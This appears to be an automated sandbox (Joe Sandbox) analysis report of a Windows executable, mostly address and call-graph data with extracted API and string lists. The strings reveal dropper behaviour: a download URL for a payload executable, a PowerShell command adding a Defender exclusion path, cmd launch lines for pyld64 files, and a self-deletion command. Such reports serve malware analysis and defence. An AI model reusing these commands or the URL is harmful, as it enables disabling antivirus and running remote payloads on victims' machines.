7ff646e499e7 
19419->19421 19420->19405 19421->19420 19422 7ff646e420e0 72 API calls 19421->19422 19423 7ff646e49a5f 19422->19423 19424 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 19423->19424 19425 7ff646e49a70 19424->19425 19427 7ff646e5ce47 GetLastError 19426->19427 19428 7ff646e5ca91 19426->19428 19431 7ff646e6032c 19427->19431 19428->19403 19432 7ff646e6014c __vcrt_InitializeCriticalSectionEx 5 API calls 19431->19432 19433 7ff646e60353 TlsGetValue 19432->19433 19436 7ff646e59bec 37 API calls 19435->19436 19437 7ff646e58680 19436->19437 19439 7ff646e49242 19438->19439 19440 7ff646e49193 19438->19440 19441 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 19439->19441 19440->19439 19446 7ff646e4919d 19440->19446 19442 7ff646e49251 19441->19442 19442->18782 19443 7ff646e491e1 19444 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 19443->19444 19445 7ff646e491fe 19444->19445 19445->18782 19446->19443 19448 7ff646e61474 19446->19448 19449 7ff646e614a4 19448->19449 19452 7ff646e611c4 19449->19452 19451 7ff646e614c2 19451->19443 19453 7ff646e611e4 19452->19453 19458 7ff646e61211 19452->19458 19454 7ff646e61219 19453->19454 19455 7ff646e611ee 19453->19455 19453->19458 19459 7ff646e61104 19454->19459 19456 7ff646e62350 _invalid_parameter_noinfo 35 API calls 19455->19456 19456->19458 19458->19451 19466 7ff646e610b8 EnterCriticalSection 19459->19466 19468 7ff646e591ba GetLastError 19467->19468 19469 7ff646e591c2 19467->19469 19468->19469 19469->18788 19469->18791 19469->18795 19471 7ff646e58857 19470->19471 19472 7ff646e58812 GetLastError 19470->19472 19471->18796 19471->18803 19473 7ff646e5881f 19472->19473 19474 7ff646e5882e SetFileInformationByHandle 19472->19474 19473->19471 19473->19474 19474->19471 19475 7ff646e5884f GetLastError 19474->19475 19475->19471 19477 7ff646e45411 19476->19477 19503 7ff646e58e3c 19477->19503 19480 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 19481 7ff646e454ac 19480->19481 19481->18834 19481->18838 
19483 7ff646e47a6c 19482->19483 19484 7ff646e4d2d0 37 API calls 19483->19484 19485 7ff646e47ad1 CreateProcessW 19484->19485 19486 7ff646e47b19 WaitForSingleObject CloseHandle CloseHandle 19485->19486 19488 7ff646e47b15 19485->19488 19486->19488 19487 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 19490 7ff646e47b89 19487->19490 19489 7ff646e47b75 ctype 19488->19489 19491 7ff646e47b9a 19488->19491 19489->19487 19490->18844 19492 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19491->19492 19493 7ff646e47b9f 19492->19493 19494 7ff646e4b800 71 API calls 19493->19494 19495 7ff646e47bb1 19494->19495 19495->18844 19544 7ff646e48cc0 19496->19544 19500 7ff646e44987 19501 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 19500->19501 19502 7ff646e44998 19501->19502 19504 7ff646e58e7e 19503->19504 19505 7ff646e58f44 19504->19505 19508 7ff646e58edf GetFileAttributesExW 19504->19508 19537 7ff646e58e87 19504->19537 19507 7ff646e59178 __std_fs_open_handle 2 API calls 19505->19507 19505->19537 19506 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 19509 7ff646e45427 19506->19509 19510 7ff646e58fbc 19507->19510 19508->19505 19511 7ff646e58ef3 GetLastError 19508->19511 19509->19480 19512 7ff646e58fe2 19510->19512 19513 7ff646e58fc2 19510->19513 19514 7ff646e58f02 FindFirstFileW 19511->19514 19511->19537 19516 7ff646e5908f 19512->19516 19517 7ff646e58ff1 GetFileInformationByHandleEx 19512->19517 19515 7ff646e58fcd CloseHandle 19513->19515 19513->19537 19518 7ff646e58f16 GetLastError 19514->19518 19519 7ff646e58f21 FindClose 19514->19519 19520 7ff646e59151 19515->19520 19515->19537 19521 7ff646e590aa GetFileInformationByHandleEx 19516->19521 19522 7ff646e590e4 19516->19522 19523 7ff646e5900b GetLastError 19517->19523 19524 7ff646e59031 19517->19524 19518->19537 19519->19505 19525 7ff646e62b78 BuildCatchObjectHelperInternal 36 API calls 19520->19525 19521->19522 19526 7ff646e590c0 GetLastError 19521->19526 19528 7ff646e590fb 19522->19528 
19529 7ff646e59137 19522->19529 19527 7ff646e59019 CloseHandle 19523->19527 19523->19537 19524->19516 19535 7ff646e59052 GetFileInformationByHandleEx 19524->19535 19531 7ff646e59156 19525->19531 19532 7ff646e590d2 CloseHandle 19526->19532 19526->19537 19533 7ff646e59162 19527->19533 19527->19537 19534 7ff646e59101 CloseHandle 19528->19534 19528->19537 19530 7ff646e5913d CloseHandle 19529->19530 19529->19537 19530->19520 19530->19537 19540 7ff646e62b78 BuildCatchObjectHelperInternal 36 API calls 19531->19540 19536 7ff646e5915c 19532->19536 19532->19537 19538 7ff646e62b78 BuildCatchObjectHelperInternal 36 API calls 19533->19538 19534->19520 19534->19537 19535->19516 19539 7ff646e5906e GetLastError 19535->19539 19541 7ff646e62b78 BuildCatchObjectHelperInternal 36 API calls 19536->19541 19537->19506 19542 7ff646e59168 19538->19542 19539->19537 19543 7ff646e5907c CloseHandle 19539->19543 19540->19536 19541->19533 19543->19531 19543->19537 19545 7ff646e48ce0 19544->19545 19545->19545 19546 7ff646e4c1f0 37 API calls 19545->19546 19547 7ff646e44965 19546->19547 19548 7ff646e441d0 19547->19548 19560 7ff646e414f0 19548->19560 19550 7ff646e441f8 19571 7ff646e443d0 19550->19571 19552 7ff646e442cc ctype 19552->19500 19553 7ff646e44292 19553->19552 19554 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19553->19554 19555 7ff646e442e1 19554->19555 19556 7ff646e414f0 72 API calls 19555->19556 19557 7ff646e44327 19556->19557 19558 7ff646e443d0 78 API calls 19557->19558 19559 7ff646e4439d 19558->19559 19559->19500 19609 7ff646e48d00 19560->19609 19562 7ff646e41524 19563 7ff646e5c798 __std_exception_copy 35 API calls 19562->19563 19564 7ff646e41570 19563->19564 19565 7ff646e415ae ctype 19564->19565 19568 7ff646e415e5 19564->19568 19566 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 19565->19566 19567 7ff646e415d4 19566->19567 19567->19550 19569 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19568->19569 19570 7ff646e415ea 
__std_exception_destroy ctype 19569->19570 19570->19550 19625 7ff646e58880 19571->19625 19576 7ff646e4b500 41 API calls 19577 7ff646e4449c 19576->19577 19578 7ff646e444d1 19577->19578 19645 7ff646e4c0a0 19577->19645 19659 7ff646e49670 19578->19659 19581 7ff646e444e4 19582 7ff646e49670 39 API calls 19581->19582 19583 7ff646e444f9 19582->19583 19584 7ff646e49670 39 API calls 19583->19584 19585 7ff646e44513 19584->19585 19586 7ff646e44546 19585->19586 19587 7ff646e49670 39 API calls 19585->19587 19591 7ff646e44553 ctype 19586->19591 19664 7ff646e4c2f0 19586->19664 19588 7ff646e4452c 19587->19588 19590 7ff646e49670 39 API calls 19588->19590 19590->19586 19592 7ff646e445fe ctype 19591->19592 19594 7ff646e44633 19591->19594 19595 7ff646e4462e 19591->19595 19593 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 19592->19593 19596 7ff646e44612 19593->19596 19597 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19594->19597 19598 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19595->19598 19596->19553 19599 7ff646e44639 ctype 19597->19599 19598->19594 19600 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19599->19600 19601 7ff646e4472b __std_exception_destroy ctype 19599->19601 19602 7ff646e44781 ctype 19600->19602 19601->19553 19603 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19602->19603 19604 7ff646e448ae 19603->19604 19605 7ff646e5c798 __std_exception_copy 35 API calls 19604->19605 19606 7ff646e448e2 19605->19606 19607 7ff646e48d00 72 API calls 19606->19607 19608 7ff646e44927 19607->19608 19608->19553 19610 7ff646e48d2e 19609->19610 19615 7ff646e48dd2 19610->19615 19617 7ff646e48d4a BuildCatchObjectHelperInternal 19610->19617 19620 7ff646e48d7a 19610->19620 19624 7ff646e48e0d 19610->19624 19611 7ff646e41210 37 API calls 19612 7ff646e48e13 19611->19612 19613 7ff646e48780 70 API calls 19612->19613 19616 7ff646e48e34 ctype 19613->19616 19614 7ff646e5aae8 std::_Facet_Register 37 API calls 19618 
7ff646e48d90 19614->19618 19621 7ff646e5aae8 std::_Facet_Register 37 API calls 19615->19621 19616->19562 19617->19562 19618->19617 19623 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19618->19623 19619 7ff646e48e07 19622 7ff646e41170 Concurrency::cancel_current_task 37 API calls 19619->19622 19620->19614 19620->19619 19621->19617 19622->19624 19623->19619 19624->19611 19678 7ff646e624a0 19625->19678 19628 7ff646e58892 AreFileApisANSI 19629 7ff646e44434 19628->19629 19630 7ff646e4b500 19629->19630 19631 7ff646e44469 19630->19631 19632 7ff646e4b552 19630->19632 19631->19576 19633 7ff646e4b643 19632->19633 19683 7ff646e588a8 WideCharToMultiByte 19632->19683 19707 7ff646e41730 19633->19707 19636 7ff646e4b649 19637 7ff646e41aa0 2 API calls 19636->19637 19639 7ff646e4b655 19637->19639 19640 7ff646e4b58c __scrt_get_show_window_mode 19642 7ff646e588a8 4 API calls 19640->19642 19643 7ff646e4b61b 19642->19643 19643->19631 19703 7ff646e41aa0 19643->19703 19646 7ff646e4c1e5 19645->19646 19650 7ff646e4c0c9 19645->19650 19647 7ff646e41210 37 API calls 19646->19647 19648 7ff646e4c1eb 19647->19648 19649 7ff646e5aae8 std::_Facet_Register 37 API calls 19657 7ff646e4c114 BuildCatchObjectHelperInternal 19649->19657 19651 7ff646e4c15d 19650->19651 19652 7ff646e4c121 19650->19652 19650->19657 19653 7ff646e5aae8 std::_Facet_Register 37 API calls 19651->19653 19652->19649 19654 7ff646e4c1df 19652->19654 19653->19657 19656 7ff646e41170 Concurrency::cancel_current_task 37 API calls 19654->19656 19655 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19655->19654 19656->19646 19657->19655 19658 7ff646e4c1a7 ctype BuildCatchObjectHelperInternal 19657->19658 19658->19578 19660 7ff646e496d2 19659->19660 19662 7ff646e49693 BuildCatchObjectHelperInternal 19659->19662 19713 7ff646e4c460 19660->19713 19662->19581 19663 7ff646e496eb 19663->19581 19665 7ff646e4c450 19664->19665 19669 7ff646e4c31f 19664->19669 19666 7ff646e41210 37 API calls 19665->19666 19667 7ff646e4c456 
19666->19667 19668 7ff646e5aae8 std::_Facet_Register 37 API calls 19676 7ff646e4c36a BuildCatchObjectHelperInternal 19668->19676 19670 7ff646e4c377 19669->19670 19671 7ff646e4c3b3 19669->19671 19669->19676 19670->19668 19672 7ff646e4c44a 19670->19672 19673 7ff646e5aae8 std::_Facet_Register 37 API calls 19671->19673 19675 7ff646e41170 Concurrency::cancel_current_task 37 API calls 19672->19675 19673->19676 19674 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19674->19672 19675->19665 19676->19674 19677 7ff646e4c406 ctype BuildCatchObjectHelperInternal 19676->19677 19677->19591 19679 7ff646e67380 _Getctype 36 API calls 19678->19679 19680 7ff646e624a9 19679->19680 19681 7ff646e69680 _Getctype 36 API calls 19680->19681 19682 7ff646e58889 19681->19682 19682->19628 19682->19629 19684 7ff646e58907 19683->19684 19685 7ff646e588ff GetLastError 19683->19685 19686 7ff646e58914 WideCharToMultiByte 19684->19686 19688 7ff646e4b571 19684->19688 19685->19684 19687 7ff646e58942 GetLastError 19686->19687 19686->19688 19687->19688 19688->19636 19688->19640 19689 7ff646e4d6d0 19688->19689 19690 7ff646e4d86a 19689->19690 19693 7ff646e4d6ff 19689->19693 19691 7ff646e41210 37 API calls 19690->19691 19692 7ff646e4d870 19691->19692 19692->19640 19695 7ff646e4d75c 19693->19695 19696 7ff646e4d798 19693->19696 19701 7ff646e4d74f __scrt_get_show_window_mode BuildCatchObjectHelperInternal 19693->19701 19694 7ff646e5aae8 std::_Facet_Register 37 API calls 19694->19701 19695->19694 19697 7ff646e4d864 19695->19697 19698 7ff646e5aae8 std::_Facet_Register 37 API calls 19696->19698 19699 7ff646e41170 Concurrency::cancel_current_task 37 API calls 19697->19699 19698->19701 19699->19690 19700 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19700->19697 19701->19700 19702 7ff646e4d80e ctype __scrt_get_show_window_mode BuildCatchObjectHelperInternal 19701->19702 19702->19640 19704 7ff646e41ab0 19703->19704 19705 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 19704->19705 19706 
7ff646e41ad8 19705->19706 19708 7ff646e41743 19707->19708 19709 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 19708->19709 19710 7ff646e4176b 19709->19710 19711 7ff646e5c798 __std_exception_copy 35 API calls 19710->19711 19712 7ff646e4179d 19711->19712 19712->19636 19714 7ff646e4c5e1 19713->19714 19717 7ff646e4c498 19713->19717 19715 7ff646e41210 37 API calls 19714->19715 19716 7ff646e4c5e7 19715->19716 19732 7ff646e58cd8 19716->19732 19720 7ff646e4c52c 19717->19720 19721 7ff646e4c4f0 19717->19721 19728 7ff646e4c4e3 BuildCatchObjectHelperInternal 19717->19728 19718 7ff646e5aae8 std::_Facet_Register 37 API calls 19718->19728 19723 7ff646e5aae8 std::_Facet_Register 37 API calls 19720->19723 19721->19718 19724 7ff646e4c5db 19721->19724 19722 7ff646e4c635 ctype 19722->19663 19723->19728 19726 7ff646e41170 Concurrency::cancel_current_task 37 API calls 19724->19726 19725 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19725->19724 19726->19714 19728->19725 19731 7ff646e4c58c ctype BuildCatchObjectHelperInternal 19728->19731 19729 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19730 7ff646e4c659 19729->19730 19730->19663 19731->19663 19733 7ff646e4c602 19732->19733 19734 7ff646e58ce2 FindClose 19732->19734 19733->19722 19733->19729 19734->19733 19735 7ff646e58cf1 19734->19735 19736 7ff646e62b78 BuildCatchObjectHelperInternal 36 API calls 19735->19736 19737 7ff646e58cf6 19736->19737

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$CurrentDirectoryDownloadFile
                          • String ID: :$cmd.exe /c {}$https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exe$powershell -Command "Add-MpPreference -ExclusionPath '{}'"$start "" "{}"${}\pyld64.exe
                          • API String ID: 3881568712-293492150
                          • Opcode ID: 3bd65feed952b0ad94b3697cae216dfbc650da4c0f19702ece63dfaa4f1c20c7
                          • Instruction ID: cae4a5833f9a5f66f54106bae3d574338c965a5383c8510b5364ed84dd9a0b39
                          • Opcode Fuzzy Hash: 3bd65feed952b0ad94b3697cae216dfbc650da4c0f19702ece63dfaa4f1c20c7
                          • Instruction Fuzzy Hash: 0E12A321A1CBC281E751B77CE84426AABB0BB56374F104376DAFD855FADF2DA142CB01

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: Sleep$_invalid_parameter_noinfo_noreturn$AllocateCheckFileFreeInitializeMembershipModuleNameToken
                          • String ID: "$timeout /t 10 /nobreak && del "{}"
                          • API String ID: 2170925606-2375892666
                          • Opcode ID: 6c58272db017810f1fb10a02c44dc568b704be8e37eb715e7faaa9869de241d5
                          • Instruction ID: 9aec5db1940650594ee31ca1ac2fbe3662da7b4353c2d938dcf8177fd525c0a6
                          • Opcode Fuzzy Hash: 6c58272db017810f1fb10a02c44dc568b704be8e37eb715e7faaa9869de241d5
                          • Instruction Fuzzy Hash: 6A715F72F1CB5189FB00EBB9E8853ADA3B1FB48788F501136DA5D92A99DF39D184C700

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 3251591375-0
                          • Opcode ID: 06dcafce427ad2013d2a2520821c7d367541db3bd139956188ba7abefa0f1ead
                          • Instruction ID: 60e872e363df591e5919c620e1d79802bb1405ce97649271f3e5eb7af2601bb5
                          • Opcode Fuzzy Hash: 06dcafce427ad2013d2a2520821c7d367541db3bd139956188ba7abefa0f1ead
                          • Instruction Fuzzy Hash: E0315E21E0D24785FA54BBA8A4653F9A3D1BF41389F445435EA0DCB6D3DE2FA404D711

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          • Opcode ID: 482119c73dbecc6f01a2d13653977d386b4c4b43497574547c26fc4dc47e9c88
                          • Instruction ID: ede2c42ce1a52dd4fe7caf9c72b0602a36d7b22da925b759eb2b651afcc02f68
                          • Opcode Fuzzy Hash: 482119c73dbecc6f01a2d13653977d386b4c4b43497574547c26fc4dc47e9c88
                          • Instruction Fuzzy Hash: 83D09214B1C716C2EA483B706C9907993E17F5970AF106438C94FC7353CE2E680D4340

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0

                          Control-flow Graph

                          APIs
                          Strings
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID: AppPolicyGetProcessTerminationMethod
                          • API String ID: 544645111-2031265017

                          Control-flow Graph

                          APIs
                          Similarity
                          • API ID: HandleModule$AddressFreeLibraryProc
                          • String ID:
                          • API String ID: 3947729631-0

                          Control-flow Graph

                          APIs
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00007FF646E677C0: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF646E672A7), ref: 00007FF646E67815
                          • InitializeCriticalSectionEx.KERNEL32(?,?,00000000,00007FF646E6E775,?,?,00000000,?,?,00007FF646E7216C), ref: 00007FF646E6E4BB
                          Similarity
                          • API ID: AllocateCriticalHeapInitializeSection
                          • String ID:
                          • API String ID: 2575566380-0

                          Control-flow Graph

                          APIs
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0

                          Control-flow Graph

                          APIs
                          Similarity
                          • API ID: __vcrt_uninitialize_ptd
                          • String ID:
                          • API String ID: 1180542099-0

                          Control-flow Graph

                          APIs
                          • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF646E5B164
                            • Part of subcall function 00007FF646E5CCF0: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF646E5CCF8
                            • Part of subcall function 00007FF646E5CCF0: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF646E5CCFD
                          Similarity
                          • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                          • String ID:
                          • API String ID: 1208906642-0

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 343 7ff646e69514-7ff646e69543 VirtualProtect
                          APIs
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          APIs
                          Similarity
                          • API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handle
                          • String ID:
                          • API String ID: 2398595512-0
                          APIs
                          Strings
                          Similarity
                          • API ID: CurrentDirectoryDownloadFile_invalid_parameter_noinfo_noreturn
                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set${}\pyld64.dll
                          • API String ID: 473140952-662293507
                          APIs
                          Strings
                          Similarity
                          • API ID: CloseHandle$User$ActiveConsoleCreateProcessQuerySessionToken_invalid_parameter_noinfo_noreturn
                          • String ID: cmd.exe /c start "" "{}"
                          • API String ID: 3081551734-1675525727
                          APIs
                          Similarity
                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                          • String ID:
                          • API String ID: 1617910340-0
                          APIs
                          Strings
                          Similarity
                          • API ID: NameTranslate$CodeInfoLocalePageValid_invalid_parameter_noinfo
                          • String ID: utf8
                          • API String ID: 2487361160-905460609
                          APIs
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                          • String ID:
                          • API String ID: 3140674995-0
                          APIs
                          Similarity
                          • API ID: Locale$InfoValid$CodeDefaultEnumLocalesPageSystemUser
                          • String ID:
                          • API String ID: 3082464267-0
                          APIs
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID:
                          • API String ID: 1239891234-0
                          APIs
                          Strings
                          Similarity
                          • API ID: InfoLocale
                          • String ID: ACP$OCP
                          • API String ID: 2299586839-711371036
                          • API ID: FileFindFirst_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 2227656907-0
                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 2933794660-0
                          • API ID:
                          • String ID: nan
                          • API String ID: 0-1810114945
                          • API ID: FormatInfoLocaleMessage
                          • String ID: !x-sys-default-locale
                          • API String ID: 4235545615-2729719199
                          • API ID: InfoLocale$_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 4006003004-0
                          • API ID: InfoLocale
                          • String ID: GetLocaleInfoEx
                          • API String ID: 2299586839-2904428671
                          Strings
                          • 00000000, xrefs: 00007FF646E4E49B
                          • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00007FF646E4E4A5
                          • API ID:
                          • String ID: 00000000$00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899
                          • API String ID: 0-756571863
                          • API ID:
                          • String ID: gfff
                          • API String ID: 0-1553575800
                          • API ID: Info
                          • String ID:
                          • API String ID: 1807457897-0
                          • API ID:
                          • String ID: gfff
                          • API String ID: 0-1553575800
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          APIs
                          • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF646E71115,?,00000000,00000092,?,?,00000000,?,00007FF646E64D97), ref: 00007FF646E709B2
                          • API ID: EnumLocalesSystem
                          • String ID:
                          • API String ID: 2099609381-0
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          APIs
                          • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF646E710D0,?,00000000,00000092,?,?,00000000,?,00007FF646E64D97), ref: 00007FF646E70A62
                          • API ID: EnumLocalesSystem
                          • String ID:
                          • API String ID: 2099609381-0
                          APIs
                          • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF646E68FC8,?,?,?,?,?,?,?,?,00000000,00007FF646E6FF44), ref: 00007FF646E68CC6
                          • API ID: EnumLocalesSystem
                          • String ID:
                          • API String ID: 2099609381-0
                          • API ID: ControlDevice
                          • String ID:
                          • API String ID: 2352790924-0
                          APIs
                          • GetLastError.KERNEL32 ref: 00007FF646E6AEA1
                            • Part of subcall function 00007FF646E677C0: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF646E672A7), ref: 00007FF646E67815
                            • Part of subcall function 00007FF646E68670: HeapFree.KERNEL32(?,?,00007FF646E65F93,00007FF646E6F34A,?,?,?,00007FF646E6F6C7,?,?,00000000,00007FF646E6FC41,?,?,?,00007FF646E6FB73), ref: 00007FF646E68686
                            • Part of subcall function 00007FF646E68670: GetLastError.KERNEL32(?,?,00007FF646E65F93,00007FF646E6F34A,?,?,?,00007FF646E6F6C7,?,?,00000000,00007FF646E6FC41,?,?,?,00007FF646E6FB73), ref: 00007FF646E68690
                            • Part of subcall function 00007FF646E71694: _invalid_parameter_noinfo.LIBCMT ref: 00007FF646E716C7
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          Similarity
                          • API ID: ErrorHeapLast$AllocateFree_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3806578645-0
                          • Opcode ID: 8b292681c10ba5506c02ee95be1f95a896873db35b0991908ac7a4bb87d7e974
                          • Instruction ID: a687526142b9215ff0b3aec29407f0218ac908bbed9e7791fa839e17867e3051
                          • Opcode Fuzzy Hash: 8b292681c10ba5506c02ee95be1f95a896873db35b0991908ac7a4bb87d7e974
                          • Instruction Fuzzy Hash: 0641D161F0D24341EA60BA2A68117BAE6D0BF84B80F946135EF4D877C2EE3EE4119700
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          Similarity
                          • API ID: HeapProcess
                          • String ID:
                          • API String ID: 54951025-0
                          • Opcode ID: afc3732fb09b00957e6d9b9e59837188e6bcaccd39b1973a2f17ab7d337b00b0
                          • Instruction ID: 5ea24d45a56079c69c87094a161b793755a584d88b75b74d2cc4d527ad91dd93
                          • Opcode Fuzzy Hash: afc3732fb09b00957e6d9b9e59837188e6bcaccd39b1973a2f17ab7d337b00b0
                          • Instruction Fuzzy Hash: DEB09220F0FB06C2EA183B156C8222862E47F88706F944038C44D91320EE2D20A5AB01
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8630088bedf43b45efc83e78047511b165fa0e48c8b5310172f303b3592d8840
